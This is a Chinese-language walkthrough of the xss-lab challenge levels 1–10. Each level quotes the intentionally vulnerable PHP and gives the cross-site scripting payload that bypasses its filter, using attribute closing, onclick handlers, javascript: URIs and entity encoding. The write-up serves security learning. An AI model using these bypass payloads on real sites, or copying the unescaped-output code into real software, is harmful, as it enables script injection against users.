xss-lab
第一关
data:image/s3,"s3://crabby-images/0ad43/0ad43edee0f3b35410a1988ffd0d005bc21a8a2b" alt="在这里插入图片描述"
将name的值直接输出
可以利用
<script>alert(1)</script>
弹窗
data:image/s3,"s3://crabby-images/c00a3/c00a3626b34d6d09d7bef6f72e3ff8350eefa895" alt="在这里插入图片描述"
第二关
使用第一关的方法
data:image/s3,"s3://crabby-images/e56b9/e56b9454d3f7d44929754038783bf51fef04738d" alt="在这里插入图片描述"
行不通
查看php源代码,在github上下载
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
<?php
在<h2> 部分有htmlspecialchars函数对其进行了过滤
(htmlspecialchars() 函数把一些预定义的字符转换为 HTML 实体。)
在<input name=keyword value="'.$str.'"> 部分,未进行过滤
可以将input闭合
"><script>alert(1)</script>
data:image/s3,"s3://crabby-images/28335/28335a2bb571de3fb1ec734b58df3b0c3e58b1a8" alt="在这里插入图片描述"
第三关
data:image/s3,"s3://crabby-images/3cbd7/3cbd7629eaf0ffce9048290316f6615e34ad2711" alt="在这里插入图片描述"
会将搜索框的内容展示出来
尝试<>()
data:image/s3,"s3://crabby-images/b4466/b4466d0596ff5041f5f3cf61951e4c56a083683a" alt="在这里插入图片描述"
会进行过滤
查看源代码之后发现
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
<center><img src=level3.png></center>
<?php
input处也进行了过滤,但是没有过滤‘
不能使用<script>alert(1)</script>
因为对<>进行了过滤
使用
'onclick='alert(1)
data:image/s3,"s3://crabby-images/a96c9/a96c9aaba4f513abb361dbf5dfb12c3ff2d385b7" alt="在这里插入图片描述"
点击搜索框之后
data:image/s3,"s3://crabby-images/3faac/3faace54495cc30e1a6dd215ccb972160bd99815" alt="在这里插入图片描述"
第四关
尝试使用<script>alert(1)</script> 发现<>被过滤 data:image/s3,"s3://crabby-images/4b29f/4b29ff181539301c7a83210645154e824bed6474" alt="在这里插入图片描述"
尝试用’οnclick=‘alert(1)
data:image/s3,"s3://crabby-images/16ea3/16ea319ec0c34f2adcbe344dd8a007864a647f63" alt="在这里插入图片描述"
并没有作用
尝试
"onclick="alert(1)
data:image/s3,"s3://crabby-images/0c39b/0c39ba2e547622c1b26ca94d9591e60ae76ebff8" alt="在这里插入图片描述"
点击之后
data:image/s3,"s3://crabby-images/b81a7/b81a7d2b09a0264409701e16517aa8859482ded6" alt="成功"
查看源代码
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
发现
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
对<>进行了过滤
input处可以采用"" 来闭合
第五关
尝试<script>alert(1)</script>
data:image/s3,"s3://crabby-images/6436d/6436d7dd945cdac1abbfc565b0e7b9fff07fccbb" alt="在这里插入图片描述"
script被过滤成scr_ipt
尝试οnclick=alaert(1)
data:image/s3,"s3://crabby-images/6d03b/6d03bc3141ebadc84955d54d5649fcd277f1ebdd" alt="在这里插入图片描述"
onclick被过滤成o_nclick
所以采用其他标签构建
<a href="javascript:alert(1)">
data:image/s3,"s3://crabby-images/2b6c7/2b6c748c17b2b6ebd27965d844a9cb27c6bf9c1d" alt="在这里插入图片描述"
要对前面进行闭合、
"><a href="javascript:alert(1)">
data:image/s3,"s3://crabby-images/f609f/f609f7c963848a65c82282ef9ed482f491ceeb21" alt="在这里插入图片描述"
点击产生的超链接
data:image/s3,"s3://crabby-images/ac7bb/ac7bb45e2d1c224e249bf9cf54cda68696fcd94c" alt="在这里插入图片描述"
查看源代码
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
对关键字<script替换成<scr_ipt,关键字on替换成o_n
input处使用:>进行闭合
<a> 标签定义超链接,用于从一个页面链接到另一个页面。
<a> 元素最重要的属性是 href 属性,它指定链接的目标。
第六关
经过测试之后,发现他对script onclick href均会过滤
用">可以将前面进行闭合
使用大写的HREF尝试
data:image/s3,"s3://crabby-images/614b8/614b8654478a6f3db42dc8e09df1ce30d2a9fb17" alt="在这里插入图片描述"
data:image/s3,"s3://crabby-images/2fc7b/2fc7bf703676d3baf0d2101b97330aab4920279c" alt="在这里插入图片描述"
(在被过滤的情况下,使用大写字符尝试)
第七关
尝试<script>alert(1)</script>
发现对script进行了过滤
我们尝试将script中间插入script
data:image/s3,"s3://crabby-images/dd631/dd631037b945834709592c225865990135ef1505" alt="在这里插入图片描述"
可以输出成为script
前面加上">进行闭合
data:image/s3,"s3://crabby-images/16089/16089435a449eef3bd5404d5adde30535548b50d" alt="在这里插入图片描述"
查看源代码
<?php
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
strtolower()把所有字符转换为小写
故可屏蔽大小写
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
将script、on、src、data、href均替换为空
第八关
通过友情连接进行注入
javascript:alert(1)
data:image/s3,"s3://crabby-images/f447c/f447c6bb2ec312a88cca8493f4834f4183fadde7" alt="在这里插入图片描述"
script变为scr_ipt
大佬说用html实体转换进行绕过
data:image/s3,"s3://crabby-images/786f7/786f7c33b4990a716670f51f9a47447ebb6405fe" alt="在这里插入图片描述"
javascript:alert(1)
data:image/s3,"s3://crabby-images/428c1/428c13ddc41824a503e7c625aace226990e0f4d3" alt="在这里插入图片描述"
data:image/s3,"s3://crabby-images/ad3b3/ad3b3e0d16ce320285602debac172d6cd34bee02" alt="在这里插入图片描述"
源代码
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
第九关
尝试上一关的代码
javascript:alert(1)
data:image/s3,"s3://crabby-images/ff8cd/ff8cdd12d4927aa71517c61c19697875fce25961" alt="在这里插入图片描述"
被判断为不合法
查看源代码
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
}
else
{
echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
输入不含http://则会判定为不合法
故构造
javascript:alert('http://')
data:image/s3,"s3://crabby-images/e89cd/e89cd5fad20a15e2ccace40973dc749348803f34" alt="在这里插入图片描述"
data:image/s3,"s3://crabby-images/d2502/d2502dd904e484a06ccd8000fa32d612afd53085" alt="在这里插入图片描述"
strpos()函数:查找字符串在另一字符串中第一次出现的位置
不存在则执行if中的语句,判断为不合法
第十关
data:image/s3,"s3://crabby-images/c275f/c275fe42283f9ba6632b08faf4daa5bc3e973f6a" alt="在这里插入图片描述"
有keyword的存在,却没有输入框
毫无思绪
查看源代码
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
keyname并不是要注入的地方,真正注入的地方是三个input,但是这三个input被隐藏了
大佬说构造出
/level10.php?t_sort="onclick=alert(1) type=text"
data:image/s3,"s3://crabby-images/edf9b/edf9bda7da547a2350221b006679f563d87e1c1b" alt="在这里插入图片描述"
点击输入框
data:image/s3,"s3://crabby-images/f1ce2/f1ce2c9405b77e91a6dc2c55211cecc41eaf9f50" alt="在这里插入图片描述"
|